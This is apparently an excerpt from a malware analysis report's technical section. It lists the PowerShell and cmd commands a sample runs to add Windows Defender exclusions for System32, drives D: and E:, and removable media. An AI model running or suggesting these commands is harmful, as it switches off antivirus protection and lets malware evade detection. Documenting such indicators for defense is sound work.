Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%WINDIR% \System32'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath 'D:\'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<SYSTEM32>'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath 'E:\'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<Drive name for removable media>:\'"
- '<SYSTEM32>\cmd.exe' /C powershell -Command "Add-MpPreference -ExclusionPath '%WINDIR% \System32'"
- '<SYSTEM32>\cmd.exe' /C powershell -Command "Add-MpPreference -ExclusionPath '<SYSTEM32>'"
- '<SYSTEM32>\cmd.exe' /C powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
- '<SYSTEM32>\cmd.exe' /C powershell -Command "Add-MpPreference -ExclusionPath 'E:\'"
- '<SYSTEM32>\cmd.exe' /C powershell -Command "Add-MpPreference -ExclusionPath '<Drive name for removable media>:\'"